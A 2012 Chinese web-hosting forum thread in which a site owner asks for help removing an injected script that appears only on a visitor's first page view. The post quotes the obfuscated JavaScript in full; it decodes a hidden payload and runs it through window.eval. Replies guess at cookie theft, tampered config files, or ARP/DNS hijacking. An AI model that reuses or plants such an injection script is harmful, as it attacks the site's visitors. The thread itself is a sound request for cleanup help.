全球主机交流论坛

标题: 谁见过这种马,求清除!!!【感谢A大】 [打印本页]
作者: yafeiml    时间: 2012-6-3 12:01
标题: 谁见过这种马,求清除!!!【感谢A大】
本帖最后由 yafeiml 于 2012-6-3 12:11 编辑

访客首次访问有代码,第二次访问就没有了。。
已经搜索2天内修改的文件,无发现js、php、html之类被修改。。。
代码是随机加密的,如下:
  1. <script type='text/javascript'>st="no3nno3mapno3rxcopno3rxukpno3rxtc";Date&&(a=["a#%d]%b@%e_%c)%1<%5*%4+%9:%3^%2","%7!%0|%f~%8?%6&"]);var b=[],c="&!^<^])&~&_&)!:$^@$|&:&&$?$]^<^]^]&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*$_&:&_&+&*!?+~&&$?&!^<$:$:!@!?^+^]^!^$+*^&^@!&&<!$|&^^]&_&*!!$|++&<!+&*^@&^$_!^&*!+*+&:&]&*$?&^$_&!&*!+*+&:&]&*$?$:$:^@&*&+^]&_&*!!$|++&<!+&*$?&^$_&!&*!+*+&:&]&*$?$:$@!?^+$:^@&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*^]&!^<$@$^]$@&*!^&^&<!|&*$?&*&+$_!+&~+!+]*+*^!+!:&_&!$?$:$:$@$^@&*!?!|&:!*!^^]$@&*&+$_!+&~+!+]*+*^!+!:&_&!$?$:$@$^@!|&<!+&?^]$~$^@&!^^^]?!+!+!|^#$~$~$@!^!+$_!*!|&)&<&^&*$?$~&*&_^|$~&!$)!$:$_!*!|&)&<&^&*$?$~&_&~^^$~&!$)*$:$_!*!|&)&<&^&*$?$~!|&*!$!?$~&!$)$_$:$@$~!+&~!|^$_&?!+&]&)$^@!&&<!$|&+^]$]^<$<^]&_&<!&&:&!&<!+&~!$_!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&:&_&+&*!?+~&&$?&&:!*&&&~!?$:$)&*^]$^<$)&?^]&&!*&_&^!+&:&~&_$?$:!@!]^@&?$_!|!~!+&~!+!:!|&*^]!@&$^#&&!*&_&^!+&:&~&_$?$:!@!*!+!*!_$|&!^^!]$)&<^#&&!*&_&^!+&:&~&_$?$:!@!&&<!$|&&^]&+&~&^!*&]&*&_!+$)&:^]!!&:&_&+&~!!$)&!^]!+&?&:!^^@!+!$!:!@!&*!^]!&*!+!^&*!++<!+!+!:!^&+&&$^@!&&<!$|&<^]*@*]^@&+!)!)$?&*^]$^|$:^@&<$_!|!*!^&?$??&*&:&!&?!+$)$!^!*&$!^!+!:&_&!$)$!+!*&^!*&<!+&*+*&)&*&]&*&_!+&!&*!+$)$!!&:&+!+&?$)$|$!&&]&:&&!$!^&*!+$)!&*!$)~&+!:$)<!|!|&*&_&++^&?&:&)&+$)&*$)&&$)$!^!^$:^@!&&<!$|&#^]&<*@^$*]*@&<*@^<*]*]$?^^$)^<^&$:^@!&+@^]&<*@^+*]*@&<*@^<*]*]$?^^$)^&$:$@<&]&*$^@!|^]&<*@^**]*@&<*@^<*]*]$?^^$)^<^<$:$@$!*!+&*$^@!&&<!$|&@^]&!$_&$?$:$)&$^]&<*@^:*]*@&#*]$?!&+@$:^@&$*@&<*@^<^|*]*]^]&@^@&$*@&<*@^^*]*]^]&<*@^?*]^@&$*@&<*@^|*]*]^]&<*@^?*]^@&<*@^:*]*@&<*@^&*]*]*@&<*@^!*]*]$?&$:!]&^&<!+&^&?$?&]$:!@&&$_!!!:!+&*$?$^)&?!+&]&)^_^)&~&+!:^_^)$~&~&+!:^_^)$~&?!+&]&)^_$:$)&:$_!^&*!+*+&:&]&*&~!*!+$?&&!*&_&^!+&:&~&_$?$:!@&!$_&<$?$:!]$)^$^^^^$:!]!]!]^@!&&<!$|&)^]&_&*!!$|&?^@&:&&$?!!&:&_&+&~!!$_&_&<!&&:&!&<!+&~!$_!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&]&<!+&^&?$?$~&&&:!*&&&~!?!)&]!^&:&*$~&:$:$:!@&)$_&<$?$:^@!]$|&*&)!^&*$|!@$|&+&~&^!*&]&*&_!+$_&~&_&]&~!*!^&*&]&~!&&*^]&&!*&_&^!+&:&~&_$?$:!@&)$_&<$?$:^@&+&~&^!*&]&*&_!+$_&~&_&]&~!*!^&*&]&~!&&*^]&_!*&)&)!]!]!]^@"; function e(){e=a.join("$").split("%");for(var d in e)"string"==typeof e[d]&&(c=c.split(e[d].substr(1)).join(e[d].substr(0,1)));return this}var f=e(),a="";for(_E=~b-~b;_E<c.length/2;_E++)a+="%"+c.substr(2*_E,2);window.eval(f.decodeURIComponent(a));</script>
复制代码
作者: Administrator    时间: 2012-6-3 12:01
提示: 作者被禁止或删除 内容自动屏蔽
作者: hackfengl    时间: 2012-6-3 12:02
找楼上A大
作者: 母‪鸡    时间: 2012-6-3 12:02
cookie吧,看下文件的修改时间,,,如果是伪造了修改时间的话就手动吧。。一般都放在config还有functions里
作者: yafeiml    时间: 2012-6-3 12:04
Administrator 发表于 2012-6-3 12:01
记录COOKIE的吧

更新帖子了,求看。。
作者: yafeiml    时间: 2012-6-3 12:05
母‪鸡 发表于 2012-6-3 12:02
cookie吧,看下文件的修改时间,,,如果是伪造了修改时间的话就手动吧。。一般都放在config还有functions ...

时间戳什么的都检查过了,另不知道是怎么被挂的。。。
以前有过一次,把主题重写,所有文件都更新了一遍才搞定的,工程浩大啊。。。
作者: 藐视天地    时间: 2012-6-3 12:06
不会
作者: Administrator    时间: 2012-6-3 12:06
提示: 作者被禁止或删除 内容自动屏蔽
作者: yafeiml    时间: 2012-6-3 12:08
A大已回复,感谢A大。
作者: 有个就好    时间: 2012-6-3 12:08
不是ARP就是DNS
作者: yafeiml    时间: 2012-6-3 12:09
有个就好 发表于 2012-6-3 12:08
不是ARP就是DNS

已排除!
作者: geyunbing    时间: 2012-6-3 12:11
提示: 作者被禁止或删除 内容自动屏蔽
作者: yafeiml    时间: 2012-6-3 12:12
geyunbing 发表于 2012-6-3 12:11
问A大

A大交流中
作者: Jouleken    时间: 2012-6-3 12:12
提示: 作者被禁止或删除 内容自动屏蔽
作者: 过客    时间: 2012-6-3 13:09
等答案,长见识。



欢迎光临 全球主机交流论坛 (https://fd.vvwvv.eu.org/) Powered by Discuz! X3.4